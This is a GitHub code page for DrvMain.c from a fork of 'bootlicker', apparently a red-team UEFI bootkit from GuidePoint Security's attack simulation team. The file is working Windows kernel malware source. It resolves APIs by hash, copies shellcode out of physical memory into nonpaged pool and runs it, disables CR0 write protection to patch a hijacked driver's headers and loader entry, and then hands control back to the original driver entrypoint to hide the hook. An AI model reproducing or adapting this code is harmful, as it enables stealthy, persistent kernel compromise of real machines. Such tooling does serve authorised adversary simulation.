forked from realoriginal/bootlicker
-
Notifications
You must be signed in to change notification settings - Fork 0
/
DrvMain.c
137 lines (112 loc) · 3.38 KB
/
DrvMain.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
/*!
*
* BOOTLICKER
*
* GuidePoint Security LLC
*
* Threat and Attack Simulation Team
*
!*/
#include "Common.h"
VOID
NTAPI
KeSetSystemAffinityThread(
_In_ SIZE_T Affinity
);
PVOID
NTAPI
ExAllocatePool(
_In_ SIZE_T PoolType,
_In_ SIZE_T NumberOfBytes
);
VOID
NTAPI
MmUnmapIoSpace(
_In_ LPVOID BaseAddress,
_In_ SIZE_T NumberOfBytes
);
PVOID
NTAPI
MmMapIoSpace(
_In_ LPVOID PhysicalAddress,
_In_ SIZE_T NumberOfBytes,
_In_ SIZE_T CacheType
);
typedef struct
{
D_API( KeSetSystemAffinityThread );
D_API( ExAllocatePool );
D_API( MmUnmapIoSpace );
D_API( MmMapIoSpace );
} API ;
/* API Hashes */
#define H_API_KESETSYSTEMAFFINITYTHREAD 0x80679c78 /* KeSetSystemAffinityThread */
#define H_API_EXALLOCATEPOOL 0xa1fe8ce1 /* ExAllocatePool */
#define H_API_MMUNMAPIOSPACE 0xf2610ec4 /* MmUnmapIoSpace */
#define H_API_MMMAPIOSPACE 0x7fbf0801 /* MmMapIoSpace */
/*!
*
* Purpose:
*
* Copies over a larger kernel shellcode and injects
* it into the host memory.
*
!*/
D_SEC( G ) NTSTATUS NTAPI DrvMain( _In_ PVOID DriverObject, _In_ PVOID RegistryPath )
{
API Api;
ULONG Ofs = 0;
PVOID Fcn = NULL;
PVOID Phy = NULL;
PEFTBL Eft = NULL;
PIMAGE_DOS_HEADER Dos = NULL;
PIMAGE_NT_HEADERS Nth = NULL;
PIMAGE_SECTION_HEADER Sec = NULL;
PLDR_DATA_TABLE_ENTRY Ldr = NULL;
/* Zero out stack structures */
RtlSecureZeroMemory( &Api, sizeof( Api ) );
/* Get efi table */
Eft = C_PTR( G_PTR( EfTbl ) );
Dos = C_PTR( U_PTR( Eft->TgtDrvImgBase ) );
Nth = C_PTR( U_PTR( Dos ) + Dos->e_lfanew );
Ldr = C_PTR( U_PTR( Eft->TgtDrvLdrEntry ) );
Sec = C_PTR( U_PTR( Eft->TgtDrvImgSect ) );
/* Get functions */
Api.KeSetSystemAffinityThread = PeGetFuncEat( Eft->KernelBase, H_API_KESETSYSTEMAFFINITYTHREAD );
Api.ExAllocatePool = PeGetFuncEat( Eft->KernelBase, H_API_EXALLOCATEPOOL );
Api.MmUnmapIoSpace = PeGetFuncEat( Eft->KernelBase, H_API_MMUNMAPIOSPACE );
Api.MmMapIoSpace = PeGetFuncEat( Eft->KernelBase, H_API_MMMAPIOSPACE );
/* Map the physical memory */
if ( ( Phy = Api.MmMapIoSpace( Eft->KernelBuf, Eft->KernelLen, 0 ) ) != NULL ) {
/* Allocate a nonpaged pool to execute over */
if ( ( Fcn = Api.ExAllocatePool( 0 /* NonPaged */, Eft->KernelLen ) ) != NULL ) {
/* Copy over the buffer */
__builtin_memcpy( Fcn, Phy, Eft->KernelLen );
/* Get KernelMain() addr */
Ofs = U_PTR( G_PTR( KmEnt ) ) - U_PTR( G_PTR( EfiMain ) );
Fcn = C_PTR( U_PTR( Fcn ) + Ofs );
/* Execute KernelMain( KernelBase ); */
( ( VOID NTAPI ( * )( PVOID, PVOID ) ) Fcn )( Eft->KernelBase, Eft->TgtDrvImgBase );
};
/* Unmap the memory */
Api.MmUnmapIoSpace( Phy, Eft->KernelLen );
};
/* Force to 1 CPU */
Api.KeSetSystemAffinityThread( 1 );
/* Remove write protection */
__writecr0( __readcr0() &~ 0x000010000 );
/* Fix the section permissions */
Sec->Characteristics &= IMAGE_SCN_MEM_EXECUTE;
/* Fix the entrypoint */
Ldr->EntryPoint = C_PTR( U_PTR( Dos ) + U_PTR( Eft->TgtDrvAddressOfEntrypoint ) );
/* Fix the image header */
Nth->OptionalHeader.AddressOfEntryPoint = Eft->TgtDrvAddressOfEntrypoint;
/* Insert write protection */
__writecr0( __readcr0() | 0x000010000 );
/* Zero out stack structures */
RtlSecureZeroMemory( &Api, sizeof( Api ) );
/* Execute original driver entrypoint */
return ( ( __typeof__( DrvMain ) * ) C_PTR( U_PTR( Eft->TgtDrvImgBase ) + Eft->TgtDrvAddressOfEntrypoint ) )(
DriverObject, RegistryPath
);
};